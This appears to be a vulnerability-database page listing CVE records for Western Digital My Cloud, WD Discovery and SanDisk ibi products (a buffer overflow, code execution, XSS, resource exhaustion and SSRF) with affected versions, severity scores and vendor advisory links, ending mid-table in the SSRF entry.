cpe:2.3:o:westerndigital:my_cloud_ex2_ultra_firmware:*:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:westerndigital:wd_cloud_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "wd_cloud_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_dl4100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_dl4100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_dl2100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_dl2100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_ex2100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_ex2100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_mirror_g2_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_mirror_g2_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_pr4100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_pr4100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_pr2100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_pr2100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_ex4100_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_ex4100_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:westerndigital:my_cloud_ex2_ultra_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "my_cloud_ex2_ultra_firmware",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22170",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-27T18:11:23.363352Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T18:36:19.698Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "ddns-start",
"platforms": [
"Linux"
],
"product": "My Cloud",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.29.102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Western Digital My Cloud ddns-start on Linux allows Overflow Buffers.\u003cp\u003eThis issue affects My Cloud: before 5.29.102.\u003c/p\u003e"
}
],
"value": "Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Western Digital My Cloud ddns-start on Linux allows Overflow Buffers.This issue affects My Cloud: before 5.29.102."
}
],
"impacts": [
{
"capecId": "CAPEC-100",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-100 Overflow Buffers"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 9.2,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T17:06:39.555Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24005-western-digital-my-cloud-os-5-firmware-5-29-102"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Unchecked buffer in Dynamic DNS client",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2024-22170",
"datePublished": "2024-09-27T17:06:39.555Z",
"dateReserved": "2024-01-05T18:43:18.488Z",
"dateUpdated": "2024-09-27T18:36:19.698Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22169 (GCVE-0-2024-22169)
Vulnerability from nvd – Published: 2024-08-02 18:31 – Updated: 2024-08-05 18:55
VLAI
Title
Misconfiguration in node.js causing a code execution in WD Discovery
Summary
WD Discovery
versions prior to 5.0.589 contain a misconfiguration in the Node.js environment
settings that could allow code execution by utilizing the 'ELECTRON_RUN_AS_NODE' environment variable.
Any malicious application operating with standard user permissions can exploit
this vulnerability, enabling code execution within WD Discovery application's
context. WD Discovery version 5.0.589 addresses this issue by disabling certain
features and fuses in Electron. The attack vector for this issue requires the victim to have the WD Discovery app installed on their device.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
1 reference
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | WD Discovery |
Affected:
0 , < 5.0.589
(custom)
|
|
| westerndigital | wd_discovery |
Affected:
0 , < 5.0.589
(custom)
cpe:2.3:a:westerndigital:wd_discovery:-:*:*:*:*:mac_os:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:westerndigital:wd_discovery:-:*:*:*:*:mac_os:*:*"
],
"defaultStatus": "unknown",
"product": "wd_discovery",
"vendor": "westerndigital",
"versions": [
{
"lessThan": "5.0.589",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22169",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T18:52:00.824388Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-05T18:55:48.270Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "WD Discovery",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.0.589",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Western Digital would like to thank YoKo Kho, Fahad Alamri, and AbdulKarim from HakTrak Cybersecurity Squad for reporting this issue"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eWD Discovery\nversions prior to 5.0.589 contain a misconfiguration in the Node.js environment\nsettings that could allow code execution by utilizing the \u0027\u003cspan style=\"background-color: var(--wht);\"\u003eELECTRON_RUN_AS_NODE\u0027\u0026nbsp;\u003c/span\u003eenvironment variable.\nAny malicious application operating with standard user permissions can exploit\nthis vulnerability, enabling code execution within WD Discovery application\u0027s\ncontext. WD Discovery version 5.0.589 addresses this issue by disabling certain\nfeatures and fuses in Electron.\u0026nbsp;\u003cspan style=\"background-color: var(--wht);\"\u003eThe attack vector for this issue requires the victim to have the WD Discovery app installed on their\u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003edevice.\u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003e\u003cbr\u003e\u003c/span\u003e\n\n\n\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "WD Discovery\nversions prior to 5.0.589 contain a misconfiguration in the Node.js environment\nsettings that could allow code execution by utilizing the \u0027ELECTRON_RUN_AS_NODE\u0027\u00a0environment variable.\nAny malicious application operating with standard user permissions can exploit\nthis vulnerability, enabling code execution within WD Discovery application\u0027s\ncontext. WD Discovery version 5.0.589 addresses this issue by disabling certain\nfeatures and fuses in Electron.\u00a0The attack vector for this issue requires the victim to have the WD Discovery app installed on their\u00a0device."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-02T18:31:11.324Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24004-wd-discovery-desktop-app-version-5-0-589"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUsers can\ndownload the latest version from the WD Discovery Downloads page or by\nfollowing the instructions on the \u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://support-en.wd.com/app/answers/detailweb/a_id/20465\"\u003eWD Discovery: Online User Guide\u003c/a\u003e\u003c/p\u003e\n\n\n\n\n\n\u003cbr\u003e"
}
],
"value": "Users can\ndownload the latest version from the WD Discovery Downloads page or by\nfollowing the instructions on the WD Discovery: Online User Guide https://support-en.wd.com/app/answers/detailweb/a_id/20465"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Misconfiguration in node.js causing a code execution in WD Discovery",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2024-22169",
"datePublished": "2024-08-02T18:31:11.324Z",
"dateReserved": "2024-01-05T18:43:18.488Z",
"dateUpdated": "2024-08-05T18:55:48.270Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22168 (GCVE-0-2024-22168)
Vulnerability from nvd – Published: 2024-06-24 22:54 – Updated: 2024-08-01 22:35
VLAI
Title
Cross-Site Scripting (XSS) vulnerability on Western Digital My Cloud and SanDisk ibi Web Apps
Summary
A Cross-Site Scripting (XSS) vulnerability on the My Cloud, My Cloud Home, SanDisk ibi, and WD Cloud web apps was found which could allow an attacker to redirect the user to a crafted domain and reset their credentials, or to execute arbitrary client-side code in the user’s browser session to carry out malicious activities.The web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
Assigner
References
1 reference
Impacted products
8 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud Home web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| SanDisk | ibi web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| Western Digital | WD Cloud web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| Western Digital | My Cloud web app |
Affected:
0 , < 4.28.0-102
(custom)
|
|
| western_digital | my_cloud_home_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:western_digital:my_cloud_home_web_app:*:*:*:*:*:*:*:* |
|
| sandisk | ibi_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:sandisk:ibi_web_app:*:*:*:*:*:*:*:* |
|
| western_digital | wd_cloud_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:western_digital:wd_cloud_web_app:*:*:*:*:*:*:*:* |
|
| western_digital | my_cloud_web_app |
Affected:
0 , < 4.28.0-102
(custom)
cpe:2.3:a:western_digital:my_cloud_web_app:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:western_digital:my_cloud_home_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "my_cloud_home_web_app",
"vendor": "western_digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:sandisk:ibi_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "ibi_web_app",
"vendor": "sandisk",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:western_digital:wd_cloud_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "wd_cloud_web_app",
"vendor": "western_digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:western_digital:my_cloud_web_app:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "my_cloud_web_app",
"vendor": "western_digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22168",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-25T14:37:19.734049Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T14:51:55.016Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T22:35:34.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24003-western-digital-my-cloud-os-5-my-cloud-home-sandisk-ibi-and-wd-cloud-web-app-update"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "My Cloud Home web app",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "ibi web app",
"vendor": "SanDisk",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "WD Cloud web app",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "My Cloud web app",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Western Digital would like to thank Jay Mehta for reporting this issue"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: var(--wht);\"\u003eA Cross-Site Scripting (XSS) vulnerability on the My Cloud, My Cloud Home, SanDisk ibi, and WD Cloud web apps was found which \u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003ecould allow an attacker to redirect the user to a crafted domain and reset their credentials, or to execute arbitrary client-side code in the user\u2019s browser session to carry out malicious activities.\u003c/span\u003e\u003cp\u003eThe web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data.\u003c/p\u003e\u003cbr\u003e"
}
],
"value": "A Cross-Site Scripting (XSS) vulnerability on the My Cloud, My Cloud Home, SanDisk ibi, and WD Cloud web apps was found which could allow an attacker to redirect the user to a crafted domain and reset their credentials, or to execute arbitrary client-side code in the user\u2019s browser session to carry out malicious activities.The web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T22:54:16.903Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24003-western-digital-my-cloud-os-5-my-cloud-home-sandisk-ibi-and-wd-cloud-web-app-update"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003eThe web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data.\u003c/p\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e"
}
],
"value": "The web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cross-Site Scripting (XSS) vulnerability on Western Digital My Cloud and SanDisk ibi Web Apps",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2024-22168",
"datePublished": "2024-06-24T22:54:16.903Z",
"dateReserved": "2024-01-05T18:43:18.488Z",
"dateUpdated": "2024-08-01T22:35:34.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22819 (GCVE-0-2023-22819)
Vulnerability from nvd – Published: 2024-02-05 21:26 – Updated: 2024-09-05 22:47
VLAI
Title
Uncontrolled resource consumption vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products
Summary
An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.
Severity
4.9 (Medium)
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-770 - Allocation of Resources Without Limits or Throttling
Assigner
References
1 reference
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud OS 5 |
Affected:
0 , < 5.27.161
(custom)
|
|
| Western Digital | My Cloud Home & Duo |
Affected:
0 , < 9.5.1-104
(custom)
|
|
| SanDisk | ibi |
Affected:
0 , < 9.5.1-104
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-22819",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-07T16:00:14.828373Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-07T16:00:24.870Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:20:30.729Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud OS 5",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.27.161",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud Home \u0026 Duo",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "ibi",
"vendor": "SanDisk",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Sam Thomas (@_s_n_t) of Pentest Ltd (@pentestltd) working with Trend Micro\u2019s Zero Day Initiative"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAn uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.\u003c/span\u003e"
}
],
"value": "An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-05T22:47:28.039Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003c/p\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eFor My Cloud OS 5 devices, \u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWestern Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version.\u003c/span\u003e\u003c/p\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e"
}
],
"value": "For My Cloud OS 5 devices, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\n\nMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Uncontrolled resource consumption vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2023-22819",
"datePublished": "2024-02-05T21:26:53.171Z",
"dateReserved": "2023-01-06T20:23:44.301Z",
"dateUpdated": "2024-09-05T22:47:28.039Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22817 (GCVE-0-2023-22817)
Vulnerability from nvd – Published: 2024-02-05 21:26 – Updated: 2024-08-02 10:20
VLAI
Title
Server-side Request Forgery vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products
Summary
Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed by fixing DNS addresses that refer to loopback. This issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104.
Severity
5.5 (Medium)
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
1 reference
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
